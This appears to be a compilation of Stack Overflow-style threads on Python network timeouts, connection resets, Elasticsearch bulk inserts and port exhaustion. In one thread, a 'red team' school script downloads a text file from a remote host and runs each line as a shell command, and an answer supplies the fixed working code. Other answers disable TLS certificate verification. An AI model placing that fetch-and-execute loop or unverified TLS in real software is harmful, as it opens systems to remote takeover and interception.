I have a Python script on an Amazon EC2 server that requests data from two different servers (using urllib3's http.request()); that data is then recorded to a text file. It has to run for a long time, so I am using nohup to keep it running in the background.
The thing is, it stops after a while (sometimes it lasts 24 hours, sometimes 2 hours; it varies). I don't get an error message or anything. It just stops, and the last string of characters received is saved to the text file as an incomplete string (just the part it could read from the remote server).
What could be causing this problem?
This is the code I have:
import urllib3  # sudo pip install urllib3 --upgrade
import time

urllib3.disable_warnings()  # disable urllib3 warnings about unverified connections

http = urllib3.PoolManager()
f = open('okcoin.txt', 'w')
f2 = open('bitvc.txt', 'w')

while True:
    try:
        r = http.request("GET", "https://www.okcoin.com/api/v1/future_ticker.do?symbol=btc_usd&contract_type=this_week")
        r2 = http.request("GET", "http://market.bitvc.com/futures/ticker_btc_week.js")
    except:  # catch all exceptions
        continue
    # Status code 200 means the server answered with an OK
    if r.status != 200 or r2.status != 200 or r.data.count(',') < 5 or r2.data.count(',') < 5:
        # Avoids blank data: there should be at least 5 commas for the data to be valid
        continue  # try to read again if there was a problem with either reading
    received = str(time.time())  # timestamp of when the information was received by this script
    data = r.data + "," + received + "\r\n"
    data2 = r2.data + "," + received + "\r\n"
    print data, r.status
    print data2, r2.status
    f.write(data)
    f2.write(data2)
    time.sleep(0.5)
    f.flush()  # flush files
    f2.flush()

f.close()
f2.close()
EDIT: I left the program open using screen over SSH. It stopped again. If I press Ctrl+C to stop it, this is what I get:
^CTraceback (most recent call last):
File "tickersave.py", line 72, in <module>
r2 = http.request("GET","http://market.bitvc.com/futures/ticker_btc_week.js")
File "/usr/local/lib/python2.7/dist-packages/urllib3/request.py", line 68, in request
**urlopen_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/request.py", line 81, in request_encode_url
return self.urlopen(method, url, **urlopen_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 153, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 541, in urlopen
**response_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/response.py", line 284, in from_httplib
**response_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/response.py", line 104, in __init__
self._body = self.read(decode_content=decode_content)
File "/usr/local/lib/python2.7/dist-packages/urllib3/response.py", line 182, in read
data = self._fp.read()
File "/usr/lib/python2.7/httplib.py", line 551, in read
s = self._safe_read(self.length)
File "/usr/lib/python2.7/httplib.py", line 658, in _safe_read
chunk = self.fp.read(min(amt, MAXAMOUNT))
File "/usr/lib/python2.7/socket.py", line 380, in read
data = self._sock.recv(left)
Any clues? Should I add timeouts or something?
Collect all output of your program and you will find a very good hint about what is wrong. That is, definitely collect both stdout and stderr. To do that, you might want to call your program like this:
$ nohup python script.py > log.outerr 2>&1 &
That collects both stdout and stderr in the file log.outerr, and starts your program decoupled from the tty and in the background. Investigating log.outerr after your program has stopped working will probably be quite revealing.
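Beyond that: the Ctrl+C traceback in your edit shows the script blocked inside self._sock.recv(), which is exactly what happens when a request has no timeout and the remote end goes silent. Adding a timeout (and, optionally, a retry policy) to the urllib3 pool would make a stalled read raise an exception instead of hanging forever. A minimal sketch, not a drop-in fix:

import urllib3

# Fail a request instead of hanging forever: 5 s to connect, 10 s to read.
# Retry(3) retries transient failures a few times before giving up.
http = urllib3.PoolManager(
    timeout=urllib3.Timeout(connect=5.0, read=10.0),
    retries=urllib3.Retry(3),
)

r = http.request("GET", "https://www.okcoin.com/api/v1/future_ticker.do?symbol=btc_usd&contract_type=this_week")

With such a timeout in place, a stalled read raises an exception, which your existing except/continue already catches, so the loop keeps going.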
ElasticSearch 7.10.2
Python 3.8.5
elasticsearch-py 7.12.1
I'm trying to do a bulk insert of 100,000 records into Elasticsearch using the elasticsearch-py bulk helper.
Here is the Python code:
import sys
import datetime
import json
import os
import logging

from elasticsearch import Elasticsearch
from elasticsearch.helpers import streaming_bulk

# ES Configuration start
es_hosts = [
    "http://localhost:9200",
]
es_api_user = 'user'
es_api_password = 'pw'

index_name = 'index1'
chunk_size = 10000
errors_before_interrupt = 5
refresh_index_after_insert = False
max_insert_retries = 3
yield_ok = False  # if set to False will skip successful documents in the output

# ES Configuration end
# =======================

filename = 'file.json'

logging.info('Importing data from {}'.format(filename))

es = Elasticsearch(
    es_hosts,
    #http_auth=(es_api_user, es_api_password),
    sniff_on_start=True,  # sniff before doing anything
    sniff_on_connection_fail=True,  # refresh nodes after a node fails to respond
    sniffer_timeout=60,  # and also every 60 seconds
    retry_on_timeout=True,  # should timeout trigger a retry on a different node?
)

def data_generator():
    f = open(filename)
    for line in f:
        yield {**json.loads(line), **{
            "_index": index_name,
        }}

errors_count = 0

for ok, result in streaming_bulk(es, data_generator(), chunk_size=chunk_size, refresh=refresh_index_after_insert,
                                 max_retries=max_insert_retries, yield_ok=yield_ok):
    if ok is not True:
        logging.error('Failed to import data')
        logging.error(str(result))
        errors_count += 1
        if errors_count == errors_before_interrupt:
            logging.fatal('Too many import errors, exiting with error code')
            exit(1)

print("Documents loaded to Elasticsearch")
When the JSON file contains a small number of documents (~100), this code runs without issue. But I just tested it with a file of 100k documents, and I got this error:
WARNING:elasticsearch:POST http://127.0.0.1:9200/_bulk?refresh=false [status:N/A request:10.010s]
Traceback (most recent call last):
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 426, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 421, in _make_request
httplib_response = conn.getresponse()
File "/Users/me/opt/anaconda3/lib/python3.8/http/client.py", line 1347, in getresponse
response.begin()
File "/Users/me/opt/anaconda3/lib/python3.8/http/client.py", line 307, in begin
version, status, reason = self._read_status()
File "/Users/me/opt/anaconda3/lib/python3.8/http/client.py", line 268, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/Users/me/opt/anaconda3/lib/python3.8/socket.py", line 669, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/elasticsearch/connection/http_urllib3.py", line 251, in perform_request
response = self.pool.urlopen(
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 726, in urlopen
retries = retries.increment(
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/util/retry.py", line 386, in increment
raise six.reraise(type(error), error, _stacktrace)
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/packages/six.py", line 735, in reraise
raise value
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 670, in urlopen
httplib_response = self._make_request(
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 428, in _make_request
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 335, in _raise_timeout
raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='127.0.0.1', port=9200): Read timed out. (read timeout=10)
I have to admit this one is a bit over my head. I don't typically like to paste large error messages here, but I'm not sure which part of this message is relevant.
I can't help but think that I may need to adjust some of the params in the es object, or the configuration variables. I don't know enough about the params to make an educated decision on my own.
And last but certainly not least: it looks like some documents were loaded into the ES index nonetheless. But even stranger, the count shows 110k when the JSON file only has 100k.
TL;DR:
Reduce the chunk_size from 10000 to the default of 500 and I'd expect it to work. You probably also want to disable automatic retries if they can give you duplicates.
What happened?
In your streaming_bulk call, you specified chunk_size=10000. This means streaming_bulk will try to insert chunks of 10000 elements. The connection to Elasticsearch has a configurable timeout, which by default is 10 seconds. So, if your Elasticsearch server takes more than 10 seconds to process the 10000 elements you want to insert, a timeout will occur and be handled as an error.
When creating your Elasticsearch object, you also specified retry_on_timeout=True, and in the streaming_bulk call you set max_retries=max_insert_retries, which is 3.
This means that when such a timeout happens, the library will retry up to 3 times; however, if the insert still times out after that, it will give you the error you noticed. (Documentation)
Also, when the timeout happens, the library cannot know whether the documents were inserted successfully, so it has to assume they were not. Thus, it will try to insert the same documents again. I don't know what your input lines look like, but if they do not contain an _id field, this would create duplicates in your index. You probably want to prevent this -- either by adding some kind of _id, or by disabling the automatic retry and handling it manually.
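For example, if each input line happens to carry some stable unique field (the doc_id key below is purely hypothetical), you could derive _id from it so a retried insert overwrites the earlier copy instead of duplicating it. A minimal sketch of the generator, under that assumption:

def data_generator():
    with open(filename) as f:
        for line in f:
            doc = json.loads(line)
            yield {
                **doc,
                "_index": index_name,
                # 'doc_id' is a hypothetical unique field; use whatever stable
                # identifier your documents actually have
                "_id": doc["doc_id"],
            }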
What to do?
There are two ways you can go about this:
Increase the timeout
Reduce the chunk_size
streaming_bulk by default has chunk_size set to 500. Your 10000 is much higher. I wouldn't expect a big performance gain from increasing this beyond 500, so I'd advise you to just use the default of 500 here. If 500 still fails with a timeout, you may even want to reduce it further. This can happen if the documents you want to index are very complex.
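With the configuration variables at the top of your script, that is a one-line change:

chunk_size = 500  # was 10000; 500 is streaming_bulk's default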
You could also increase the timeout for the streaming_bulk call or, alternatively, for your es object. To change it only for the streaming_bulk call, you can provide the request_timeout keyword argument:
for ok, result in streaming_bulk(
        es,
        data_generator(),
        chunk_size=chunk_size,
        refresh=refresh_index_after_insert,
        request_timeout=60*3,  # 3 minutes
        yield_ok=yield_ok):
    # handle like you did
    pass
However, this also means that an Elasticsearch node failure will only be detected after this higher timeout. See the documentation for more details.
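If you prefer to raise the timeout for every call made through the client rather than just the bulk insert, the Elasticsearch constructor also accepts a timeout parameter. A sketch, reusing the settings from the question:

es = Elasticsearch(
    es_hosts,
    timeout=180,  # default per-request timeout in seconds for this client
    sniff_on_start=True,
    sniff_on_connection_fail=True,
    sniffer_timeout=60,
    retry_on_timeout=True,
)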
I have a script that is supposed to read a text file from a remote server and then execute whatever is in the txt file.
For example, if the text file has the command "ls", the computer will run the command and list the directory.
Also, please don't suggest using urllib2 or whatever. I want to stick with Python 3.x.
As soon as I run it I get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url)
ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import os
import urllib.request

IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
    print("####")
    os.system(line)
Edit:
Yes, I realize this is a bad idea. It is a school project; we are playing red team, and we are supposed to get access to a kiosk. I figured that instead of writing code that tries to get around intrusion detection and firewalls, it would be easier to just execute commands from a remote server. Thanks for the help, everyone!
The error occurs because your URL does not include a protocol. Include "http://" (or "https://" if the server uses SSL/TLS) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
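A minimal sketch of the fix, keeping the rest of the script as it is (the host is still the placeholder from the question):

import os
import urllib.request

url = "http://domain.com/test.txt"  # scheme added; use https:// if the server supports TLS
with urllib.request.urlopen(url) as data:
    for line in data:
        # urlopen yields bytes in Python 3, so decode before handing the line to the shell
        os.system(line.decode().strip())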
Try
"http://localhost/domain.com/test.txt"
or the remote address. Note that if you use localhost, you need to run an HTTP server there.
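For local testing, Python's built-in HTTP server is enough to serve the file; for example, run this from the directory that contains test.txt and then fetch http://localhost:8000/test.txt:

$ python -m http.server 8000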
Overview: I am calling an API with Python 2.7 using the urllib2 and json libraries. When I run the script I receive the following error if the result count is higher than 20:
error: [Errno 10054] An existing connection was forcibly closed by the remote host
Script:
import json
import urllib2
import webbrowser

url = "http://poi.????.com:xxxx/k/search?name==smith&limit==30"

response = urllib2.urlopen(url)
webbrowser.open(url)
data = json.load(response)

count = "count = " + str(data['count'])
print count

for i in data['results']:
    name = i['name']
    print name
Expected outcome: I run the script, the API responds with a '200 OK' status, and my webbrowser.open(url) line opens the response in my browser. My IDLE shell prints the output.
Issue: When I use the limit parameter in the API and set it to less than 20, it responds as expected in my IDLE shell. However, if I set limit to more than 20 or don't set a limit at all, I still get a 200 OK response and the browser populates with the results, but my IDLE shell produces the 'connection was forcibly closed' error.
Software: I've tried this on Windows 7/8 and Ubuntu 14.04, at home via VPN and at work across a wired network.
Traceback Call in IDLE:
Traceback (most recent call last):
File "C:\Users\xxx\userQueryService.py", line 9, in <module>
data = json.load(response)
File "C:\Python27\lib\json\__init__.py", line 286, in load
return loads(fp.read(),
File "C:\Python27\lib\socket.py", line 351, in read
data = self._sock.recv(rbufsize)
File "C:\Python27\lib\httplib.py", line 573, in read
s = self.fp.read(amt)
File "C:\Python27\lib\socket.py", line 380, in read
data = self._sock.recv(left)
error: [Errno 10054] An existing connection was forcibly closed by the remote host
Traceback call in Ubuntu python shell:
>>> data = json.load(response)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/json/__init__.py", line 290, in load
**kw)
File "/usr/lib/python2.7/json/__init__.py", line 338, in loads
return _default_decoder.decode(s)
File "/usr/lib/python2.7/json/decoder.py", line 366, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
obj, end = self.scan_once(s, idx)
ValueError: Unterminated string starting at: line 1 column 43303 (char 43302)
I managed to solve my issue by using the requests library instead of urllib2 and json. I've included my code for those who have a similar issue (note that I also included an exception handler):
import webbrowser
import requests

url = "http://poi.????.com:xxxx/k/search?name==smith&limit==30"
r = requests.get(url)

try:
    data = r.json()
    webbrowser.open(url)
    count = "count = " + str(data['count'])
    print count
    for i in data['results']:
        name = i['name']
        print name
except IOError as (errno, strerror):
    print "I/O error({0}): {1}".format(errno, strerror)
I have a Python script that downloads product feeds from multiple affiliates in different ways. This didn't give me any problems until last Wednesday, when it started throwing all kinds of timeout exceptions from different locations.
Examples: Here I connect to an FTP service:
ftp = FTP(host=self.host)
threw:
Exception in thread Thread-7:
Traceback (most recent call last):
File "C:\Python27\Lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\Lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\LDLC.py", line 23, in main
ftp = FTP(host=self.host)
File "C:\Python27\Lib\ftplib.py", line 120, in __init__
self.connect(host)
File "C:\Python27\Lib\ftplib.py", line 138, in connect
self.welcome = self.getresp()
File "C:\Python27\Lib\ftplib.py", line 215, in getresp
resp = self.getmultiline()
File "C:\Python27\Lib\ftplib.py", line 201, in getmultiline
line = self.getline()
File "C:\Python27\Lib\ftplib.py", line 186, in getline
line = self.file.readline(self.maxline + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
timeout: timed out
Or downloading an XML file:
xmlFile = urllib.URLopener()
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
xmlFile.close()
throws:
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\FeedCrawler.py", line 106, in save
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
File "C:\Python27\Lib\urllib.py", line 240, in retrieve
fp = self.open(url, data)
File "C:\Python27\Lib\urllib.py", line 208, in open
return getattr(self, name)(url)
File "C:\Python27\Lib\urllib.py", line 346, in open_http
errcode, errmsg, headers = h.getreply()
File "C:\Python27\Lib\httplib.py", line 1139, in getreply
response = self._conn.getresponse()
File "C:\Python27\Lib\httplib.py", line 1067, in getresponse
response.begin()
File "C:\Python27\Lib\httplib.py", line 409, in begin
version, status, reason = self._read_status()
File "C:\Python27\Lib\httplib.py", line 365, in _read_status
line = self.fp.readline(_MAXLINE + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
IOError: [Errno socket error] timed out
These are just two examples, but there are other methods, like authenticate or other API-specific methods, where my script throws these timeout errors. It never showed this behavior until Wednesday. Also, it starts throwing them at random times: sometimes at the beginning of the crawl, sometimes later on. My script behaves this way on both my server and my local machine. I've been struggling with it for two days now but can't seem to figure it out.
This is what I know might have caused this:
On Wednesday one affiliate script broke down with the following error:
URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:581)>
I didn't change anything in my script, but it suddenly stopped crawling that affiliate and threw that error every time I tried to authenticate. I looked it up and found that it was due to an OpenSSL issue (where did that come from?). I fixed it by adding the following before the authenticate method:
if hasattr(ssl, '_create_unverified_context'):
    ssl._create_default_https_context = ssl._create_unverified_context
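(As an aside, the same workaround can be applied per call instead of globally, at least for requests that go through urllib2: the context argument was added in Python 2.7.9. A sketch with a made-up feed URL:

import ssl
import urllib2

ctx = ssl._create_unverified_context()  # skips certificate verification; only use this if you accept that risk
response = urllib2.urlopen("https://affiliate.example.com/feed.xml", context=ctx)  # hypothetical URL
print response.getcode()
)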
Little did I know, this was just the start of my problems... At the same time, I upgraded from Python 2.7.8 to Python 2.7.9. It seems that this is the moment everything broke down and started throwing timeouts.
I've tried changing my script in endless ways, but nothing worked, and like I said, it's not just one method that throws the error. I also switched back to Python 2.7.8, but that didn't do the trick either. Basically, everything that makes a request to an external source can throw an error.
Final note: My script is multi-threaded. It downloads product feeds from different affiliates at the same time. It used to run 10 threads per affiliate without a problem. I've now tried lowering it to 3 per affiliate, but it still throws these errors. Setting it to 1 is not an option because that would take ages. I don't think that's the problem anyway, because it used to work fine.
What could be wrong?
I have a web service deployed on my box. I want to check the result of this service with various inputs. Here is the code I am using:
import sys
import httplib
import urllib

apUrl = "someUrl:somePort"
fileName = sys.argv[1]
conn = httplib.HTTPConnection(apUrl)
titlesFile = open(fileName, 'r')
try:
    for title in titlesFile:
        title = title.strip()
        params = urllib.urlencode({'search': 'abcd', 'text': title})
        conn.request("POST", "/somePath/", params)
        response = conn.getresponse()
        data = response.read().strip()
        print data + "\t" + title
        conn.close()
finally:
    titlesFile.close()
This code gives an error after the same number of lines has been printed (28233). Error message:
Traceback (most recent call last):
File "testService.py", line 19, in ?
conn.request("POST", "/somePath/", params)
File "/usr/lib/python2.4/httplib.py", line 810, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.4/httplib.py", line 833, in _send_request
self.endheaders()
File "/usr/lib/python2.4/httplib.py", line 804, in endheaders
self._send_output()
File "/usr/lib/python2.4/httplib.py", line 685, in _send_output
self.send(msg)
File "/usr/lib/python2.4/httplib.py", line 652, in send
self.connect()
File "/usr/lib/python2.4/httplib.py", line 636, in connect
raise socket.error, msg
socket.error: (99, 'Cannot assign requested address')
I am using Python 2.4.3. I am calling conn.close() as well, so why is this error being raised?
This is not a Python problem.
In Linux kernel 2.4 the ephemeral port range is 32768 through 61000, so the number of available ports is 61000 - 32768 + 1 = 28233. From what I understood, because the web service in question is quite fast (<5 ms actually), all the ports get used up. The program then has to wait for about a minute or two for the ports to close.
What I did was count the number of conn.close() calls. When the count reached 28000, I waited 90 seconds and reset the counter.
BIGYaN identified the problem correctly, and you can verify it by calling "netstat -tn" right after the exception occurs: you will see very many connections in the "TIME_WAIT" state.
The alternative to waiting for port numbers to become available again is to simply use one connection for all requests. You are not required to call conn.close() after each call to conn.request(); you can simply leave the connection open until you are done with your requests.
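A minimal sketch of that change, based on the code from the question and assuming the server keeps the connection alive between requests (note that each response must be fully read before the next request is sent):

import sys
import httplib
import urllib

apUrl = "someUrl:somePort"  # same placeholders as in the question
fileName = sys.argv[1]

conn = httplib.HTTPConnection(apUrl)
titlesFile = open(fileName, 'r')
try:
    for title in titlesFile:
        title = title.strip()
        params = urllib.urlencode({'search': 'abcd', 'text': title})
        conn.request("POST", "/somePath/", params)
        response = conn.getresponse()
        data = response.read().strip()  # read the full response before reusing the connection
        print data + "\t" + title
finally:
    conn.close()  # close once, after all requests are done
    titlesFile.close()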
I too faced a similar issue while executing multiple POST requests using Python's requests library in Spark. To make it worse, I used multiprocessing on each executor to post to a server, so thousands of connections were created in seconds, and each of them took a few seconds to leave the TIME_WAIT state and release its port for the next set of connections.
Out of all the solutions available on the internet that talk about disabling keep-alive, using requests.Session(), et al., I found this one to work: it uses 'Connection': 'close' as a header parameter. You may need to put the header content on a separate line outside the post command, though.
headers = {
    'Connection': 'close'
}

with requests.Session() as session:
    response = session.post('https://xx.xxx.xxx.x/xxxxxx/x', headers=headers, files=files, verify=False)
    results = response.json()
    print results
This is my answer to a similar issue, using the above solution.